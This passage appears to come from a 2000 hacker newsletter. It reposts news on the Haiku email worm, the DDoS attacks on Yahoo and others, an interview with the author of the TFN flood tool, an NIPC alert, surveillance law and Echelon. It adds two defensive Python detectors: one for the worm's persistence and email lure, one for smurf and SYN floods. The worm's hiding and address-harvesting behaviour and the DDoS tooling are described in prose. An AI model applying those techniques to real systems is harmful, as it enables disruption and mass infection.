The next time a computer is restarted, the Worm will be loaded automatically. At that point, it will not display any messages and is registered as a service, so that it doesn't appear in the tasklist. The Worm stays resident, checking for an active dial-up Internet connection. When it finds one, it will search through files with the extension .doc, .eml, .htm, .html, .rtf and .txt looking for email addresses. The Haiku Worm then attempts to send a copy of itself to all of the email addresses that it has found.
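The indicators CA lists above (the dropped HAIKUG.EXE, the WIN.INI autostart edit, the lure subject and attachment) are enough for a simple host and mail-gateway check. The following is an added example, not code from CA, HNN or the worm; it assumes the WIN.INI edit lands on the run= or load= line of the [windows] section (the release only says the file is edited) and takes the WIN.INI text and file list as parameters so it runs offline on constructed input.

```python
"""Host-side check for the Haiku worm's persistence and a mail-gateway check
for its lure, built from the indicators in the CA release above.

Added example; not code from CA, HNN or the worm.  Labelled assumptions:
  * the WIN.INI edit is assumed to be the run= or load= line of the [windows]
    section (the classic Windows 9x autostart hook); the release only says
    the worm "edits the WIN.INI file";
  * WIN.INI contents and the list of files present are passed in, so the
    check runs offline on constructed input rather than touching C:\\WINDOWS.
"""
import re

WORM_IMAGE = "HAIKUG.EXE"                      # dropped copy named in the release
LURE_SUBJECT = "fw: compose your own haikus!"  # subject line named in the release
LURE_ATTACHMENT = "haiku.exe"                  # attachment named in the release


def parse_ini(text):
    """Minimal INI parser: {section: {key: value}}; names are lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def autostart_entries(win_ini_text):
    """Programs started by [windows] run= / load= (space- or comma-separated)."""
    windows = parse_ini(win_ini_text).get("windows", {})
    entries = []
    for key in ("run", "load"):
        entries.extend(p for p in re.split(r"[\s,]+", windows.get(key, "")) if p)
    return entries


def _basename(path):
    """Case-insensitive file name of a DOS/Windows path (either slash style)."""
    return path.upper().replace("/", "\\").rsplit("\\", 1)[-1]


def haiku_host_indicators(win_ini_text, present_files):
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    for entry in autostart_entries(win_ini_text):
        if _basename(entry) == WORM_IMAGE:
            findings.append(f"WIN.INI autostart references {entry}")
    for path in present_files:
        if _basename(path) == WORM_IMAGE:
            findings.append(f"worm image present at {path}")
    return findings


def is_haiku_lure(subject, attachment_names):
    """Gateway rule: the release's subject line together with Haiku.exe attached."""
    return (subject.strip().lower() == LURE_SUBJECT
            and any(a.strip().lower() == LURE_ATTACHMENT for a in attachment_names))


# Constructed sample input: a WIN.INI as the worm would leave it under the
# assumed run= hook, plus a clean one for comparison.
INFECTED_WIN_INI = """[windows]
load=
run=C:\\WINDOWS\\HAIKUG.EXE
[Desktop]
Wallpaper=(None)
"""
CLEAN_WIN_INI = "[windows]\nload=\nrun=\n[Desktop]\nWallpaper=(None)\n"

if __name__ == "__main__":
    print(haiku_host_indicators(INFECTED_WIN_INI, ["C:\\WINDOWS\\HAIKUG.EXE"]))
    print(haiku_host_indicators(CLEAN_WIN_INI, ["C:\\WINDOWS\\NOTEPAD.EXE"]))
    print(is_haiku_lure("Fw: Compose your own haikus!", ["Haiku.exe"]))
```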
``CA aims to provide the most current and accurate information regarding the latest Worm threats for our clients,'' said Simon Perry, CA's security business manager. ``This worm is dangerous for eBusinesses because it disguises itself cleverly and obtains email addresses from documents rather than address books. CA is urging all of our clients to download the latest signature files that will provide protection from this latest threat.''

For the latest information about computer viruses and worms, visit http://www.ca.com/virusinfo. CA is offering free downloads of antivirus software for personal use at http://antivirus.cai.com and encourages computer users to take advantage of this offering.

Computer Associates International, Inc. (NYSE: CA - news), the world's leading business software company, delivers the end-to-end infrastructure to enable eBusiness through innovative technology, services and education. CA has 18,000 employees worldwide and had revenue of $6.3 billion for the year ended December 31, 1999. For more information, visit http://www.ca.com.

All trademarks, tradenames, service marks and logos referenced herein belong to their respective companies.

SOURCE: Computer Associates International, Inc.

@HWA

128.0 HNN: Feb 11th; Investigations Continue, Reports of more Possible Attacks Surface
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Early reports indicate that Excite may have been hit with a denial of service attack early this morning. Some evidence seems to suggest that AOL has also been hit; however, neither has yet been confirmed. More information on the attacks is now becoming available as sites recover from the attacks. After further investigation Yahoo has said that they have been able to determine that they actually suffered four separate attacks prior to the one that took them offline. All the attacks had a large distributed smurf component to them.
Other sites have reported single-sourced SYN attacks, which may indicate copycat activity. Of the several attacks against Yahoo only the one beginning at 10:30am PST on Monday had any noticeable effect. The massive amount of traffic generated, in excess of 1G bits/sec, took down one router, and when it recovered Yahoo lost all routing to their upstream ISP. Because of earlier network hardware problems, investigators at first believed this to be the reason for the outage. After completely pulling the plug from their upstream ISP, Yahoo was able to stitch things back together and finally realized that they had been under a widely distributed DoS attack. The attacker(s) seemed to know about the network topology and planned this large scale attack in advance. Global Center, the Yahoo ISP, is now throttling all forms of ICMP until they can determine the best configuration to prevent future attacks.

@HWA

129.0 HNN: Feb 11th; Author of Tool Used in Attacks Speaks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Frank

Mixter, based in Germany and the author of Tribal Flood Network, has granted several interviews. He has said that using his tools to create such attacks "is quite easy".

Heise - German
http://www.heise.de/newsticker/data/nl-10.02.00-000/

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2436358,00.html

Web sabotage: a hard nut to crack for the FBI

US Attorney General Janet Reno announced a comprehensive investigation into the current acts of sabotage on the Internet at a press conference yesterday evening. The FBI, the American criminal police, has begun a manhunt for the hackers who have attacked popular Internet companies for the third day in a row. Reno assured that the Washington government would do everything to guarantee the security of electronic commerce on the Internet. No "claims of responsibility" have surfaced so far, and according to Reno the hackers' motives also remain unclear.
FBI computer security expert Ron Dick explained that the range of possible perpetrators is large. Such attacks could be the work of a teenager, but also of a foreign government. Identifying the perpetrator or perpetrators is likely to be very difficult, since large quantities of log files on a number of computer systems will have to be analysed.

In Distributed Denial-of-Service (DDoS) attacks like those of recent days, the hackers work through a multi-tiered system of infiltrated computers. The Hacker News Network (HNN) spoke of a control node on which a list of up to ten thousand cracked computers available for attacks was found. HNN also reports that some of the data bombs carried content cursing the commercialisation of the Internet. Greetings to hacker circles and to the German hacker Mixter, the programmer of a DDoS tool, were also said to have been observed. Mixter told c't he was shocked and distanced himself from the attacks: "It seems as if the attackers are fairly clueless people who misuse powerful resources and programs for pointless activities, simply because they can. This has nothing to do with hacking or 'hacktivism'."

Not least, the incidents show the risks of a digitised society that relies more and more on the availability of its electronic infrastructure: so far only e-commerce sites and service providers have been affected; the main consequences are waiting times and inconvenience for customers, and the financial damage is likely to be comparatively small. Similar attacks could, however, in principle cripple any service that runs over a publicly accessible network.
Companies could, for example, knock out competitors during time-critical negotiations, troublemakers could hinder the coordination of rescue efforts in a disaster, or governments could silence unwelcome civil rights movements. (nl/c't)

-=-

Author of Web attack tool speaks

'The Net is as susceptible to hack attacks as its weakest parts.' So says 'Mixter,' the hacker who created the tool possibly used in this week's spate of Web attacks.

By Robert Lemos, ZDNet News
UPDATED February 10, 2000 5:04 PM PT

The Internet has its own sense of irony. While chatting online with ZDNet about this week's spate of Web attacks, "Mixter" -- a self-proclaimed "white-hat hacker" who created the Tribal Flood Network denial-of-service tool some believe is responsible for several of those attacks -- was knocked offline by a flood of data similar to those very same attacks.

"It's quite easy," Mixter said of the data-flood technique used against Yahoo!, eBay, Buy.com, Amazon.com, CNN, E*Trade, MSN.com and ZDNet. And the tool allegedly created by the 20-year-old German-based hacker makes it even easier. The Tribal Flood Network and its newest version, TFN2K, can implement a denial of service by flooding servers and routers with a bewildering variety of different data types.

In an exclusive chat interview with ZDNet, Mixter called Tribal Flood Network a teaching tool that points out the holes in the Web. Others consider it a danger.

ZDNet: How did you get into security?

Mixter: Well, I worked with computers for a long time. I started with my first computer when I was 6 years old, and I've been interested in the technical details of operating systems and networks since I was about 14 when I got my first PC with an Internet connection.

ZDNet: What computer did you start with?

Mixter: Commodore 64.

ZDNet: Do you consider what you do to be "hacking"?
Mixter: I think what I do is hacking in the "traditional" sense, but I'm afraid to use the term, since the meaning of "hacker" is changing to something negative. I had some conflicts with the law in the past, but I'm a white-hat now.

ZDNet: What sort of things happened in the past?

Mixter: Well, I started with it like many people on Efnet (a major IRC chat network) do, by learning how to take over and how to secure chat channels. Then I went over to programming and writing IRC robots. Unfortunately, I have also "actively" taught myself how to get into systems. I used some compromised systems for running and testing IRC bots, for which I've been raided and persecuted, but gladly I didn't commit real major damage with anything I did. I consider it as a mistake in my past, from which I've learned.

ZDNet: Why did you want to make a tool like TFN and make it public for all the script kiddies to use and abuse?

Mixter: I rewrote TFN after what I thought Trinoo (a tool that makes another DoS attack known as SMURFing easy) worked like because Trinoo was kept private. First, I called it the "teletubby flood network," but I thought the name was just too silly. The problem (with today's infrastructure) is that a lot of weaknesses exist. For example, you can employ spoofing and distributed concepts, and it is hard to do something against it due to Internet protocol weaknesses. I decided to write TFN and post the source code publicly to security sites, so people could scrutinize the code, and possible upcoming attack methods, and come up with a patch. This is the security concept known as "full disclosure." The main idea is that security people find and post any weaknesses, including really dangerous ones, as soon as possible, so everyone has a chance of analyzing them and thinking about countermeasures.

ZDNet: Yet, there seems to be no comprehensive solution to the problem.
That is, if you want to let people access your site, you must to some degree be susceptible to a DDoS (distributed denial-of-service) attack.

Mixter: That's true, but the real problem is the lack of authentication in current protocols. Besides, you actually have to compromise a real lot of other hosts to be able to penetrate fast sites. ... That is the concept of DDoS. There are methods (to stop more advanced DoS attacks) including SYN interception and proxying at the routers. However, all these short time measures can only minimize the impact of the floods; they cannot fully prevent it. When a site is attacked really badly, they're probably still going to notice it somehow.

ZDNet: So, in your mind, what is the solution to this problem?

Mixter: Well, you can basically spoof the origin of any packet arbitrarily. And that has to be prevented in the long term by migrating to IPv6 (the next-generation Internet protocol), which provides necessary authentication facilities and a bunch of other security extensions.

ZDNet: What is the short-term solution?

Mixter: The solution for the hosts that are being compromised is simply to care about their security, by updating their software and configurations. It's that easy. The attacker *HAS* to gain access to his "slave" servers by exploiting existent security vulnerabilities. The Net is as susceptible to hack attacks as its weakest parts. Also, limit the amount of bandwidth that is being let through at the backbone provider. This is a concept that many people are implementing.

ZDNet: And when do you think IPv6 will actually make it into most of the infrastructure?

Mixter: IPv6 should get implemented as soon as possible, not only because of security aspects, but because the growth of the Internet will make it inevitably necessary by 2004, or sooner. The old IP protocol is a relic, comparable to the Y2K bug. It is soon going to cause problems if people don't care about it.
ZDNet: Do you think that the people who make these tools available (i.e., put power in the hands of people who don't use it responsibly) are responsible for the use of them? Yourself, for instance?

Mixter: No, that's generally not the case, and it is, in my opinion, irrational to say so. I also know the author of Trinoo, who hasn't directly been launching the attacks, but I think he is afraid and wants to stay anonymous.

ZDNet: Are you planning to make any other such tools?

Mixter: Currently not. I've released TFN2K, after the CERT advisory. The purpose of releasing another DDoS tool was to include all possible attacking, stealthing, etc., features in that tool that could be developed in the future I could think of. We are currently seeing new derivatives of tools with small variations, but nothing that is really worse or more "powerful" in any way. ... My purpose of releasing TFN2K was showing all these risks in one rush, and as early as possible.

ZDNet: So, anything you want to say about the attacks that are currently occurring?

Mixter: Well, there has been rumor that they included in the packets some protest against e-commerce. I think they are mostly socially motivated, and I don't condone any of such activity. Most of all because it doesn't require really great technical skill to install these tools and launch attacks, and it serves absolutely no constructive purpose.

@HWA

130.0 HNN: Feb 11th; NIPC Reissues Alert on DDoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by suthercj

The National Infrastructure Protection Center has reissued its advisory concerning Distributed Denial of Service attacks. The advisory was originally issued in December of 1999.

FBI.gov
http://www.fbi.gov/nipc/ddos.htm

(Dig, my ALL-CAPS AUTHORITAY!
yesh you can find them on IRC and on AOL as well - Ed)

SUBJECT: NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM ALERT (NIPC ALERT 00-034): RE-ISSUE OF NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM ALERT (NIPC ALERT 99-029) ORIGINALLY ISSUED 12/6/99;

1. BEGINNING ON 7 FEBRUARY 2000, A NUMBER OF HIGH-PROFILE DENIAL OF SERVICE (DOS) ATTACKS TEMPORARILY DISABLED SIGNIFICANT ELECTRONIC COMMERCE INTERNET WEB SITES. THESE CYBER ATTACKS TARGETED COMPANIES SITES LIKE YAHOO.COM, AMAZON.COM, CNN.COM, BUY.COM, EBAY.COM, STAMPS.COM, EXODUS.COM, ETRADE.COM, AND ZDNET.COM; REPORTED VICTIMS HAVE APPARENTLY RECOVERED FROM THE ATTACKS WITHIN A FEW HOURS. PUBLIC REPORTING CITES COORDINATED, DISTRIBUTED DENIAL OF SERVICE (DDOS) ATTACKS ORIGINATING FROM MULTIPLE POINTS ON THE INTERNET. THE FBI IS NOW INVESTIGATING A NUMBER OF THESE ATTACKS; IN VIEW OF THESE EVENTS THE NIPC IS RE-ISSUING ITS ORIGINAL ALERT DESCRIBING THE DDOS EXPLOIT. ADDITIONAL INFORMATION CAN ALSO BE FOUND ON THE NIPC WEB PAGE AT WWW.NIPC.GOV AND AT THE CARNEGIE MELLON COMPUTER EMERGENCY RESPONSE TEAM COORDINATION CENTER (CERT/CC) WEB PAGE AT WWW.CERT.ORG.

2. BEGINNING IN THE FALL OF 1999, THE FBI/NIPC BECAME AWARE OF SEVERAL INSTANCES WHERE INTRUDERS INSTALLED DISTRIBUTED DENIAL OF SERVICE TOOLS ON VARIOUS COMPUTER SYSTEMS TO CREATE LARGE HOST NETWORKS CAPABLE OF LAUNCHING SIGNIFICANT COORDINATED PACKET FLOODING DENIAL OF SERVICE ATTACKS. INSTALLATION WAS ACCOMPLISHED PRIMARILY THROUGH COMPROMISES EXPLOITING KNOWN SUN RPC VULNERABILITIES. THESE MULTIPLE DENIAL OF SERVICE TOOLS INCLUDE TRIN00, TRIBE FLOOD NETWORK (OR TFN), TFN2K, AND STACHELDRAHT, AND WERE REPORTED ON DIFFERENT CIVILIAN, UNIVERSITY AND U.S. GOVERNMENT SYSTEMS.
THE FBI CONTINUES INVESTIGATION OF MANY OF THESE INCIDENTS, AND WAS AND IS HIGHLY CONCERNED ABOUT THE SCALE AND SIGNIFICANCE OF THESE INCIDENTS, FOR THE FOLLOWING REASONS:

A) MANY OF THE TARGETS ARE UNIVERSITIES OR OTHER SITES WITH HIGH BANDWIDTH INTERNET CONNECTIONS, REPRESENTING A POSSIBLY SIGNIFICANT THREAT TO INTERNET TRAFFIC.
B) THE KNOWN CASES INVOLVE REAL AND SUBSTANTIAL FINANCIAL LOSS.
C) THE ACTIVITY TIES BACK TO SIGNIFICANT NUMBERS AND LOCATIONS OF DOMESTIC AND OVERSEAS IP ADDRESSES.
D) THE TECHNICAL VULNERABILITIES USED TO INSTALL THESE DENIAL OF SERVICE TOOLS ARE WIDESPREAD, WELL-KNOWN AND READILY ACCESSIBLE ON MOST NETWORKED SYSTEMS THROUGHOUT THE INTERNET.
E) THE TOOLS APPEAR TO BE UNDERGOING ACTIVE DEVELOPMENT, TESTING AND DEPLOYMENT ON THE INTERNET.
F) THE ACTIVITY OFTEN STOPS ONCE SYSTEM OWNERS START FILTERING FOR TRINOO/TFN AND RELATED ACTIVITY.

POSSIBLE MOTIVES FOR THIS MALICIOUS ACTIVITY RANGE FROM EXPLOIT DEMONSTRATION, TO EXPLORATION OR RECONNAISSANCE, TO PREPARATION FOR WIDESPREAD DENIAL OF SERVICE ATTACKS. NIPC WAS CONCERNED THAT THESE TOOLS COULD HAVE BEEN PREPARED FOR EMPLOYMENT DURING THE Y2K PERIOD, AND REMAINS CONCERNED THIS ACTIVITY COULD CONTINUE TARGETING OTHER SIGNIFICANT COMMERCIAL, GOVERNMENT OR NATIONAL SITES.

3. NIPC REQUESTS THAT ALL COMPUTER NETWORK OWNERS AND ORGANIZATIONS RAPIDLY EXAMINE THEIR SYSTEMS FOR EVIDENCE OF THESE DISTRIBUTED DENIAL OF SERVICE TOOLS, IN ORDER TO BE ABLE TO QUICKLY IMPLEMENT CORRECTIVE MEASURES (SPECIFIC TECHNICAL INSTRUCTIONS ARE AVAILABLE FROM CERT-CC, SANS, NIPC, OR OTHER SOURCES). THESE CHECKS SHOULD BE DONE TO BOTH CHECK AND CLEAR SYSTEMS OF TRINOO/TFN AND RELATED THREATS, AND TO SUPPORT LAW ENFORCEMENT EFFORTS INVESTIGATING THESE EXPLOITS. RECIPIENTS ARE ASKED TO REPORT SIGNIFICANT OR SUSPECTED CRIMINAL ACTIVITY TO THEIR LOCAL FBI OFFICE, NIPC WATCH/WARNING UNIT, COMPUTER EMERGENCY RESPONSE SUPPORT AND OTHER LAW ENFORCEMENT AGENCIES, AS APPROPRIATE.
THE NIPC WATCH AND WARNING UNIT CAN BE REACHED AT (202) 323-3204/3205/3206, OR NIPC.WATCH@FBI.GOV.

@HWA

131.0 HNN: Feb 11th; Lawmakers Succumb to Kneejerk Reaction
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

"We might have to pass some legislation to get even tougher" on computer crime, Senate Judiciary Committee Chairman Orrin Hatch, R-Utah, said Wednesday. Hatch intends to hold a hearing sometime in March to determine whether current laws give law enforcers the "tools that they need" to prosecute computer crime offenses.

News Bytes
http://www.newsbytes.com/pubNews/00/143704.html

Senators Mobilize Against Website Attacks

(I love Feds! - Ed)

By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A., 10 Feb 2000, 5:02 PM CST

Responding to the spate of recent attacks against commercial Websites, a number of legislators are calling for a crackdown on computer crime.

"We might have to pass some legislation to get even tougher" on computer crime, Senate Judiciary Committee Chairman Orrin Hatch, R-Utah, said Wednesday.

Hatch intends to hold a hearing sometime in March to determine whether current laws give law enforcers the "tools that they need" to prosecute computer crime offenses, Judiciary Committee spokesperson Jeanne Lopatto said today.

Senate Majority Leader Trent Lott has also raised concerns about the recent attacks and is "monitoring the situation," according to the majority leader's office.

Hatch, Lott and others on the Hill are reacting to the recent glut of "denial of service" attacks against large e-commerce providers such as Amazon.com, CNN.com, and E-Trade.

The most recent confirmed attack struck Excite and there are unconfirmed reports that America Online has fallen victim to a denial of service attack.

Reported by Newsbytes.com, http://www.newsbytes.com .

@HWA

dum de dum, de dum dum dum... dum de doo do you trinoo?
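The Yahoo post-mortem in 128.0 describes a widely distributed smurf (ICMP echo-reply) flood of over 1 Gbit/s, while other sites saw single-source SYN attacks, and the NIPC alert above asks network owners to examine their systems. The following is an added example, not code from HNN, Yahoo, Global Center or NIPC, of how a flow monitor can tell those two patterns apart; the per-packet record format, the addresses and the thresholds are all constructed here.

```python
"""Flow-level detection of the two flood patterns reported above: a
distributed ICMP echo-reply (smurf) flood and a single-source SYN flood.

Added example, not from HNN, Yahoo, Global Center or NIPC.  Input is a list
of constructed one-packet-per-line summaries standing in for router or
sniffer output; the format, addresses and thresholds are all made up here.
"""
from collections import defaultdict

# Constructed record format: "HH:MM:SS src dst proto detail bytes"
# detail is e.g. echo-reply / echo-request for icmp, SYN / SYN-ACK / ACK for tcp.


def parse_record(line):
    ts, src, dst, proto, detail, nbytes = line.split()
    return {"ts": ts, "src": src, "dst": dst, "proto": proto,
            "detail": detail, "bytes": int(nbytes)}


def flood_kind(rec):
    """Map a record onto the flood family it could belong to, or None."""
    if rec["proto"] == "icmp" and rec["detail"] == "echo-reply":
        return "icmp-echo-reply"      # what smurf amplifiers send the victim
    if rec["proto"] == "tcp" and rec["detail"] == "SYN":
        return "tcp-syn"              # half-open connection attempts
    return None


def detect_floods(lines, pps_threshold=100, distributed_min_sources=50):
    """Return one finding per (destination, second, kind) above pps_threshold.

    The distinct-source count separates the distributed smurf component Yahoo
    saw from the single-source SYN attacks other sites reported.  It is only
    a hint: SYN source addresses are trivially spoofed, so a 'distributed'
    SYN flood may be one host, and a single-source one may be a copycat.
    """
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_record(line)
        kind = flood_kind(rec)
        if kind:
            buckets[(rec["dst"], rec["ts"], kind)].append(rec)

    findings = []
    for (dst, ts, kind), recs in sorted(buckets.items()):
        if len(recs) < pps_threshold:
            continue
        sources = {r["src"] for r in recs}
        distributed = len(sources) >= distributed_min_sources
        if kind == "icmp-echo-reply":
            label = ("distributed ICMP echo-reply flood (smurf pattern)"
                     if distributed else "ICMP echo-reply flood from few sources")
        else:
            label = ("SYN flood from many (possibly spoofed) sources"
                     if distributed else "single-source SYN flood")
        findings.append({"dst": dst, "ts": ts, "kind": kind, "label": label,
                         "pps": len(recs), "sources": len(sources),
                         "bps": 8 * sum(r["bytes"] for r in recs)})
    return findings


def constructed_sample():
    """Synthetic traffic: 200 reflector hosts each send one echo-reply to one
    victim within a second, one host sends 300 SYNs at another, plus noise."""
    lines = [f"10:30:00 203.0.113.{i + 1} 192.0.2.10 icmp echo-reply 1500"
             for i in range(200)]
    lines += ["10:30:01 198.51.100.7 192.0.2.20 tcp SYN 60"] * 300
    lines += ["10:30:00 192.0.2.50 192.0.2.10 tcp SYN 60",        # normal handshake
              "10:30:00 192.0.2.10 192.0.2.50 tcp SYN-ACK 60",
              "10:30:01 192.0.2.51 192.0.2.10 icmp echo-request 64"]  # a lone ping
    return lines


if __name__ == "__main__":
    for finding in detect_floods(constructed_sample()):
        print(finding)
```

Bucketing by whole second keeps the example short; a real monitor would use a sliding window and per-destination baselines rather than fixed packet-per-second thresholds.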
132.0 HNN: Feb 11th; Humor in the Face of Chaos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by n

A rather funny political cartoon that pretty much sums up many people's feelings on this matter has been posted.

Cartoon
http://syndicam.com/cartoons/2000gifs/cam021000_hackers.gif

@HWA

133.0 HNN: Feb 11th; Britain Passes Despotic Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lady Sharrow

The UK Government came under fire on Thursday from the internet community after it published a Bill to regulate covert surveillance. The critics say the legislation, if passed, could lead to innocent people being sent to jail simply because they have lost their data encryption codes. The Regulation of Investigatory Powers Bill covers the monitoring and the interception of communications by law enforcement and security agencies. It will, for example, lay down the legal rules that must be followed by the police and security services when they tap someone's phone.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_638000/638041.stm

Surveillance bill under fire

At issue is the burden of proof

The UK Government came under fire on Thursday from the internet community after it published a Bill to regulate covert surveillance.

The critics say the legislation, if passed, could lead to innocent people being sent to jail simply because they have lost their data encryption codes.

The Regulation of Investigatory Powers Bill covers the monitoring and the interception of communications by law enforcement and security agencies. It will, for example, lay down the legal rules that must be followed by the police and security services when they tap someone's phone.

It also regulates the authorities' access to the codes that encrypt data sent over the net. Such encryption will increasingly become a routine tool of e-commerce, built into ordinary e-mail and browser software.
But the Home Office is deeply concerned that criminals, such as paedophiles, will use encryption to hide their activities.

And, as a result, the Bill proposes that the police or the security services should have the power to force someone to hand over decryption keys or the plain text of specified materials, such as e-mails, and jail those who refuse.

The government believes it has built sufficient safeguards into the legislation.

But Caspar Bowden, from the Foundation for Information Policy Research, said the law as drafted was "impossible" and accused the government of ignoring all the advice and lobbying it had received from the net community over the past year.

Net privacy

At issue is the burden of proof. Critics of the legislation say someone might go to jail unless they could prove they did not have a requested key - an impossible defence for someone who has lost the software code.

"This law could make a criminal out of anyone who uses encryption to protect their privacy on the internet," Mr Bowden said.

"The Department of Trade and Industry jettisoned decryption powers from its e-Communications Bill last year because it did not believe that a law which presumes someone guilty unless they can prove themselves innocent was compatible with the Human Rights Act.

"But the corpse of a law laid to rest by Trade Secretary Stephen Byers has been stitched up and jolted back into life by Home Secretary Jack Straw."

Under the new legislation, the police would have to have "reasonable grounds to believe" someone suspected illegal activity had a key. Previous attempts to draft the legislation had only used the word "appear".

Human rights

Caspar Bowden acknowledged that the change replaced a subjective test with one requiring some objective evidence. The prosecution would have to show that someone receiving encrypted e-mail has or had a key.

However, he said the presumption of guilt remained for those who had genuinely lost or forgotten their keys.
"It's clear we are heading for the courts with a human rights test case," Mr Bowden told BBC News Online. "The legislation could be amended, but it's obvious the government is not going to take that course." However, the Home Secretary, Jack Straw, is clearly confident about the legal advice he has received. "The Human Rights Act and rapid change in technology are the twin drivers of the new Bill," he said. "None of the law enforcement activities specified in the Bill is new. Covert surveillance by police and other law enforcement officers is as old as policing itself; so too is the use of informants, agents, and undercover officers. "What is new is that for the first time the use of these techniques will be properly regulated by law, and externally supervised, not least to ensure that law enforcement operations are consistent with the duties imposed on public authorities by the European Convention on Human Rights and the Human Rights Act." @HWA 134.0 HHN: Feb 11th; France Sues US and UK over Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by n The British and US Governments are to be sued in France after claims that the countries have spied on French companies, diplomats and political officials. Lawyers are planning a class action suit after confirmation last week that a global eavesdropping spy network exists. The Times UK http://www.the-times.co.uk/news/pages/tim/2000/02/10/timfgneur01007.html?999 February 10 2000 EUROPE French to sue US and Britain over network of spies FROM ADAM SAGE IN PARIS THE British and US Governments are to be sued in France after claims that they have spied on French companies, diplomats and Cabinet ministers. Lawyers are planning a class action after confirmation last week that a global anglophone spy network exists. 
Codenamed P-415 Echelon, the world's most powerful electronic spy system was revealed in declassified US National Security Agency documents published on the Internet, and is capable of intercepting telephone conversations, faxes and e-mails. The system was established in the 1980s by the UKUSA alliance, which unites the British, American, Australian, New Zealand and Canadian secret services. In Europe, its listening devices are at Menwith Hill defence base in Yorkshire. French MPs claim to have evidence that the European Airbus consortium lost a Fr35 billion (£3.5 billion) contract in 1995 after its offer was overheard and passed to Boeing. Georges Sarre, a left-wing MP, said: "The participation of the United Kingdom in spying on its European partners for and with the US raises serious and legitimate concerns in that it creates a particularly acute conflict of interest within the European Union." The European Parliament's Civil Liberties Committee will study a report on the Echelon network on February 23. The debate is certain to fuel criticism of Britain's role. Until this month, the network was an official secret recognised by none of the members of the UKUSA alliance. But the documents published by the George Washington University prove its existence and its capacity to intercept civilian satellite communications. Jean-Pierre Millet, a Parisian lawyer, said that Echelon tracked every mobile and satellite call, but only decoded those involving a key figure. "You can bet that every time a French government minister makes a mobile phone call, it is recorded," he said. M Millet said that Echelon's system leaves it open to legal challenge under French privacy laws. "The simple fact that an attempt has been made to intercept a communication is against the law in France, however the information is exploited." Yesterday he said that he would bring an action on behalf of French civil liberty groups. 
@HWA

135.0 HNN; Feb 11th; Melissa Virus Comes Back
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Not that she ever really went away, but the Melissa virus reappeared Thursday afternoon, clogging the e-mail system of Washington's Snohomish County government.

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500166597-500212095-500988439-0,00.html

Melissa virus resurfaces, shuts down Washington county e-mail system

Copyright © 2000 Nando Media
Copyright © 2000 Associated Press

EVERETT, Wash. (February 11, 2000 8:35 a.m. EST http://www.nandotimes.com) - A computer virus blamed for more than $80 million in damage last year has resurfaced, this time in the Snohomish County government's e-mail system.

The virus known as Melissa eluded virus defenses and infested county computers about noon Thursday, resulting in shutdown of the e-mail system, said Colin Bottem, director of information services. The rest of the county's computer services were not affected, Bottem said.

E-mail servers were "being cleaned up" and the system should be operating normally again Friday afternoon, Bottem said.

Melissa struck thousands of e-mail systems last March, disguised as an "important message" from a friend, and spread around the world like an electronic chain letter. In December, David L. Smith, a computer programmer, pleaded guilty in Newark, N.J., to creating the virus and using a sex Web site to spread it through cyberspace.

When the message is opened, the virus goes to the recipient's computer address book and sends the same message to the first 50 e-mail addresses. "It replicates itself," Bottem said.

@HWA

136.0 aKt0r's story by Wyzewun
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aKt0r's Story
Contributed by Wyzewun

The following is an article out of January 16th's edition of "The Star", South Africa's most popular Sunday newspaper...
[Comments by me are enclosed in square brackets]

--- Begin Article ---

Computer Boffs Hunt Teen Hacker
'Akt0r' claims his intentions are good
By Andre Jurgens

A Computer Whiz Kid has become South Africa's most wanted "cyber-villain" after breaking into nearly a dozen "safe" Internet web sites. The 19-year-old, who calls himself Akt0r, has so far evaded capture but computer security experts from the Johannesburg Stock Exchange are on his trail after an embarrassing attack on their web site last weekend.

Akt0r claims in just four months to have "cracked" sites owned by Eskom, The Police, Rand Afrikaans University, Southern Life, Stormers Rugby Club, Incredible Connection, Computicket, Durban Metropolitan Council and the government's Stats SA page. Each time he replaced their official webpages with his own messages, criticising their "clueless" security and hinting that he was willing to accept a job in the computer industry.

The companies were not eager to discuss the attacks in detail this week but all said no confidential information had been compromised.

[Wyzewun: This is true for the South African Police Service, because their page is hosted at a separate ISP and their private network is accessible only over dialup. However, I seriously doubt this is true for the likes of Incredible Connection and Southern Life.]

Akt0r told the Sunday Times he broke into the web sites "for a good cause, to prove a point actually - Security measures in South Africa are quite lame", he said, "Privacy is not well guarded. How safe do you think your personal details are?"

"I'm not malicious. I have not destroyed or stolen information."

His goals are to land a job in the information technology industry. "I've had enough of hacking. I want to get a job and make a positive contribution to the industry."

[Wyzewun: More about this after the article :P]

